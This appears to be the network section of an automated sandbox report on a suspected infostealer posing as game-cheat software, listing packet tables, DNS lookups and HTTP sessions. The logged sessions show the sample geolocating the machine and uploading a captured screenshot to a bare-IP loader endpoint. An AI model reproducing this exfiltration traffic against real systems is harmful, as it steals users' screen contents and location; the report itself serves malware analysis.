                                                                                                                                                                      Nov 6, 2023 15:35:16.031115055 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.031162977 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.031209946 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.031220913 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.031244993 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.031270027 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.034410954 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.034463882 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.034507990 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.034517050 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.034540892 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.034599066 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.036926985 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.036976099 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.037009954 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.037017107 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.037064075 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.037081957 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.039480925 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.039531946 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.039563894 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.039571047 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.039594889 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.039622068 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.042999029 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.043045998 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.043081045 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.043088913 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.043117046 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.043139935 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.045305014 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.045355082 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.045386076 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.045394897 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.045425892 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.045452118 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.047945976 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.047991991 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.048023939 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.048032045 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.048058987 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.048084974 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.050566912 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.050611019 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.050637960 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.050645113 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.050678968 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.050704956 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.053937912 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.053981066 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.054033995 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.054040909 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.054068089 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.054090977 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.056540966 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.056586981 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.056615114 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.056622028 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.056639910 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.056667089 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.058897972 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.058943033 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.058975935 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.058983088 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.059020996 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.059042931 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.062334061 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.062377930 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.062403917 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.062416077 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.062441111 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.062464952 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.064975023 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.065022945 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.065051079 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.065063953 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.065077066 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.065110922 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.083076954 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.083100080 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.083168983 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.083185911 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.083228111 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.085741997 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.085766077 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.085810900 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.085819006 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.085850000 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.085855961 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.088368893 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.088390112 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.088421106 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.088428974 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.088445902 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.088469028 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.091012955 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.091046095 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.091121912 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.091121912 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.091131926 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.091176987 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.093607903 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.093632936 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.093676090 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.093683004 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.093709946 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.093732119 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.096180916 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.096208096 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.096240997 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.096249104 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.096280098 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.096307993 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.099363089 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.099385977 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.099431038 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.099440098 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.099462986 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.099513054 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.102000952 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.102022886 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.102081060 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.102087975 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.102112055 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.102133036 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.165509939 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.165569067 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.165589094 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.165605068 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.165621996 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.165647030 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.167831898 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.167874098 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.167892933 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.167901039 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.167941093 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.167958975 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.169512987 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.169578075 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.169584036 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.169631958 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.172297955 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.172338009 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.172365904 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.172372103 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.172391891 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.172414064 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.175023079 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.175066948 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.175091028 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.175101042 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.175141096 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.175164938 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.177529097 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.177551031 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.177603960 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.177611113 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.177634001 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.177649975 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.180108070 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.180128098 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.180171967 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.180180073 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.180207014 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.180229902 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.182853937 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.182874918 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.182981968 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.182990074 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.183032990 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.185946941 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.185980082 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.186022043 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.186031103 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.186058044 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.186079979 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.188472033 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.188493967 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.188538074 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.188549042 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.188566923 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.188592911 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.191159964 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.191183090 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.191246033 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.191260099 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.191284895 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.191306114 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.192722082 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.192790985 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.192800999 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.192816019 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:16.192841053 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.192867994 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.378087044 CET49710443192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:35:16.378119946 CET44349710162.159.135.233192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:44.705333948 CET8049706208.95.112.1192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:44.705404043 CET4970680192.168.2.8208.95.112.1
                                                                                                                                                                      Nov 6, 2023 15:35:52.639214993 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:52.980511904 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:53.208043098 CET8049708193.37.71.112192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:53.208134890 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:53.857706070 CET4970680192.168.2.8208.95.112.1
                                                                                                                                                                      Nov 6, 2023 15:35:53.857814074 CET4970880192.168.2.8193.37.71.112
                                                                                                                                                                      Nov 6, 2023 15:35:53.857848883 CET4970980192.168.2.8162.159.135.233
                                                                                                                                                                      Nov 6, 2023 15:36:00.270668983 CET4971533597192.168.2.891.103.252.48
                                                                                                                                                                      Nov 6, 2023 15:36:00.573293924 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:00.574059963 CET4971533597192.168.2.891.103.252.48
                                                                                                                                                                      Nov 6, 2023 15:36:00.799024105 CET4971533597192.168.2.891.103.252.48
                                                                                                                                                                      Nov 6, 2023 15:36:01.101700068 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:01.148008108 CET4971533597192.168.2.891.103.252.48
                                                                                                                                                                      Nov 6, 2023 15:36:01.555639982 CET4971533597192.168.2.891.103.252.48
                                                                                                                                                                      Nov 6, 2023 15:36:01.858289957 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:01.913654089 CET4971533597192.168.2.891.103.252.48
                                                                                                                                                                      Nov 6, 2023 15:36:09.034656048 CET4971533597192.168.2.891.103.252.48
                                                                                                                                                                      Nov 6, 2023 15:36:09.338588953 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:09.338614941 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:09.338629007 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:09.338799953 CET4971533597192.168.2.891.103.252.48
                                                                                                                                                                      Nov 6, 2023 15:36:09.382380009 CET4971533597192.168.2.891.103.252.48
                                                                                                                                                                      Nov 6, 2023 15:36:11.953821898 CET4971533597192.168.2.891.103.252.48
                                                                                                                                                                      Nov 6, 2023 15:36:12.256141901 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:12.256184101 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:12.256196022 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:12.256445885 CET4971533597192.168.2.891.103.252.48
                                                                                                                                                                      Nov 6, 2023 15:36:12.558661938 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:12.558689117 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:12.558701038 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:12.558733940 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:12.583852053 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:12.584768057 CET4971533597192.168.2.891.103.252.48
                                                                                                                                                                      Nov 6, 2023 15:36:12.888008118 CET335974971591.103.252.48192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:36:12.929425955 CET4971533597192.168.2.891.103.252.48
                                                                                                                                                                      Nov 6, 2023 15:36:13.144226074 CET4971533597192.168.2.891.103.252.48

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Nov 6, 2023 15:35:04.876082897 CET6300953192.168.2.81.1.1.1
                                                                                                                                                                      Nov 6, 2023 15:35:05.029712915 CET53630091.1.1.1192.168.2.8
                                                                                                                                                                      Nov 6, 2023 15:35:11.444747925 CET6273753192.168.2.81.1.1.1
                                                                                                                                                                      Nov 6, 2023 15:35:11.598057985 CET53627371.1.1.1192.168.2.8

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Nov 6, 2023 15:35:04.876082897 CET192.168.2.81.1.1.10x7ccdStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 6, 2023 15:35:11.444747925 CET192.168.2.81.1.1.10x4e0Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Nov 6, 2023 15:35:05.029712915 CET1.1.1.1192.168.2.80x7ccdNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 6, 2023 15:35:11.598057985 CET1.1.1.1192.168.2.80x4e0No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 6, 2023 15:35:11.598057985 CET1.1.1.1192.168.2.80x4e0No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 6, 2023 15:35:11.598057985 CET1.1.1.1192.168.2.80x4e0No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 6, 2023 15:35:11.598057985 CET1.1.1.1192.168.2.80x4e0No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                                                                                                      Nov 6, 2023 15:35:11.598057985 CET1.1.1.1192.168.2.80x4e0No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • cdn.discordapp.com
                                                                                                                                                                      • ip-api.com

                                                                                                                                                                      HTTP Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      0192.168.2.849710162.159.135.233443C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      1192.168.2.849706208.95.112.180C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Nov 6, 2023 15:35:05.240181923 CET0OUTGET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                      User-Agent: Sun
                                                                                                                                                                      Host: ip-api.com
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Nov 6, 2023 15:35:05.392359972 CET1INHTTP/1.1 200 OK
                                                                                                                                                                      Date: Mon, 06 Nov 2023 14:35:04 GMT
                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                      Content-Length: 114
                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                      X-Ttl: 60
                                                                                                                                                                      X-Rl: 44
                                                                                                                                                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 69 74 79 22 3a 22 53 65 61 74 74 6c 65 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 22 71 75 65 72 79 22 3a 22 31 35 36 2e 31 34 36 2e 34 39 2e 31 36 38 22 7d
                                                                                                                                                                      Data Ascii: {"status":"success","countryCode":"US","city":"Seattle","timezone":"America/Los_Angeles","query":"156.146.49.168"}


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                      2192.168.2.849708193.37.71.11280C:\Program Files\Cheat Lab Inc\Cheat Lab\LuaJIT.exe
                                                                                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                                                                                      Nov 6, 2023 15:35:06.671708107 CET4OUTPUT /loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
                                                                                                                                                                      Content-Type: multipart/form-data; boundary=qMhxCagN55R5AwRzdpCrqAg3d
                                                                                                                                                                      User-Agent: Sun
                                                                                                                                                                      Host: 193.37.71.112
                                                                                                                                                                      Content-Length: 3933204
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Nov 6, 2023 15:35:06.672602892 CET15OUTData Raw: 2d 2d 71 4d 68 78 43 61 67 4e 35 35 52 35 41 77 52 7a 64 70 43 72 71 41 67 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                      Data Ascii: --qMhxCagN55R5AwRzdpCrqAg3dContent-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="screen.bmp"BM6($$######$$$$$$$$#
